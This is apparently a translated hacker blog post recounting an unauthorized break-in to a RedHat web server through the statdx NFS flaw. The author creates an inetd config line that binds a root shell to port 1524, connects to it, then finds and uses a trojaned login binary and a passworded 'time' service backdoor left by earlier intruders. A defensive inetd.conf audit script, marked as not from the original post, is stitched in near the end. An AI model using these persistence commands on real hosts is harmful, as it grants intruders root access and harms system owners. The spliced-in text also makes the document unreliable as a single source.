Sinbad
A while ago I found a RedHat host. The site's content and software looked quite good, so I got in through the statdx vulnerability in NFS and had a look around; when it was about time to leave, I wanted to plant a backdoor before going. I'm used to typing source code in with cat>, but this time, as soon as I pressed Ctrl+D, it kicked me out of the shell. I tried the vulnerability again and got connection refused; apparently the NFS service had died.
A few hours later, after finishing other work and about to close Netterm, I remembered statdx and gave it another try; to my surprise it worked. A look at uptime showed the machine had just been rebooted. Good, this time I couldn't afford to exit the shell carelessly.
Imitating a piece of the rpc.cmsd exploit, I created a file containing a record like one in /etc/inetd.conf:
bash# echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob
Then I used inetd to bind a root shell on the ingreslock port 1524:
bash# /usr/sbin/inetd /tmp/bob
Hmm, I was fairly lucky: ingreslock in /etc/services hadn't been commented out.
$ telnet www.victim.com 1524
Trying 1.1.1.1...
Connected to www.victim.com.
Escape character is '^]'.
bash#
Let's look at the processes first:
bash# ps -ef
ps -ef
PID TTY STAT TIME COMMAND
573 1 S 0:00 /sbin/mingetty tty1 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
574 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
575 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
576 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
577 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
578 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
bash#
Why does the output look like this? ps seems to have a problem; let's verify it with RPM:
bash# rpm -V `rpm -qf /bin/ps`
rpm -V `rpm -qf /bin/ps`
Cannot expand ~/.rpmrc
Cannot expand ~/.rpmrc
Heh, something's wrong? Let's check the login binary:
bash# strings /bin/login
/lib/ld-linux.so.2
__gmon_start__
libcrypt.so.1
crypt
libc.so.6
getenv
execl
putenv
__deregister_frame_info
strncpy
execv
strcmp
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh<
tJjchy
TERM=vt100
/bin/sh
DISPLAY
pLhwaT1xtzfds
/usr/bin/xlogin
Notice anything? pLhwaT1xtzfds should be an encrypted password; it certainly looks like one.
If you want to recover the password and use this backdoor someone else left behind, you can refer to my earlier article "The password in the encrypted login backdoor", which is mainly about the crypt() function.
Compare the replaced login with the original login:
bash# ls -l /bin/login /usr/bin/xlogin
ls -l /bin/login /usr/bin/xlogin
-rwsr-xr-x 1 root root 20164 Apr 17 1999 /bin/login
-rwsr-xr-x 1 root root 20164 Oct 9 16:51 /usr/bin/xlogin
The file sizes are identical, so that hacker clearly took care to fix that up; unfortunately the timestamp wasn't changed. So an ordinary system administrator would also spot the anomaly with the find command.
Since it has come to this, with the intrusion turning into intrusion detection, let's keep looking.
Let's see which services inetd has started:
bash# grep -v "^#" /etc/inetd.conf
grep -v "^#" /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
time stream tcp nowait root /usr/sbin/time in.timed
time dgram udp wait root /usr/sbin/time in.timed
Notice that there is something abnormal again. time should be internal, but here it is handled by /usr/sbin/time; nine times out of ten this is another backdoor.
bash# strings /usr/sbin/time
strings /usr/sbin/time
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
fgets
system
__deregister_frame_info
stdin
sscanf
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
QVhX
hWVS
sha0l1n
/bin/sh -i
Heh, this time the password isn't encrypted; it should be sha0l1n. Apparently this wasn't the same person who made the login backdoor.
Let's log in to time's port 37 and see:
$ telnet www.victim.com 37
Trying 1.1.1.1...
Connected to www.victim.com.
Escape character is '^]'.
sha0l1n
bash#
Sure enough...
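As a defender-side check for the inetd.conf anomalies found above, here is an added example (not code from the original post): it parses inetd.conf records and flags services that inetd normally serves internally but that point at an external program, as well as records handed straight to a shell. The sample configuration is constructed from the lines shown in this post plus one clean entry for contrast.

```python
import os

# Services that inetd implements itself; a real server program here is suspect.
INTERNAL_SERVICES = {"echo", "discard", "daytime", "chargen", "time"}
# Basenames of interactive shells that should never be an inetd server program.
SHELL_NAMES = {"sh", "bash", "ksh", "csh", "tcsh"}

# Constructed sample: the entries seen on the compromised host in the post,
# the author's own ingreslock record, and a clean internal daytime line.
SAMPLE_INETD_CONF = """\
# services handled by inetd
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
time stream tcp nowait root /usr/sbin/time in.timed
time dgram udp wait root /usr/sbin/time in.timed
daytime stream tcp nowait root internal
ingreslock stream tcp nowait root /bin/sh sh -i
"""

def parse_inetd_line(line):
    """Split one inetd.conf record into its fields; None for comments/blank lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 6)  # service socktype proto wait user server [args]
    if len(fields) < 6:
        return None
    rec = dict(zip(("service", "socktype", "proto", "wait", "user", "server", "args"), fields))
    rec.setdefault("args", "")
    return rec

def effective_program(rec):
    """The program that really handles the connection: behind tcpd it is the first argument."""
    if os.path.basename(rec["server"]) == "tcpd" and rec["args"]:
        return rec["args"].split()[0]
    return rec["server"]

def audit_inetd(text):
    """Return (service, reason) tuples for records matching the backdoor patterns."""
    findings = []
    for line in text.splitlines():
        rec = parse_inetd_line(line)
        if rec is None:
            continue
        svc, prog = rec["service"], effective_program(rec)
        if svc in INTERNAL_SERVICES and rec["server"] != "internal":
            findings.append((svc, "normally internal but served by " + rec["server"]))
        if os.path.basename(prog) in SHELL_NAMES:
            findings.append((svc, "handled directly by a shell: " + prog))
    return findings

if __name__ == "__main__":
    for svc, why in audit_inetd(SAMPLE_INETD_CONF):
        print(f"{svc}: {why}")
```

On a live system, feed it the contents of /etc/inetd.conf instead of the sample; the same checks apply to any record a sysadmin did not put there.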
This machine is really unlucky: different people got in and each installed a different backdoor. If everyone analyzed things as carefully as I do and understood the principle of "those who came before planted the trees, those who come after enjoy the shade", there would be no need to waste time planting backdoors.
The methods mentioned in this article are all very simple; I hope they give beginning readers some guidance.
If anything I've said is wrong, please leave a message in the Feedback section. Thank you.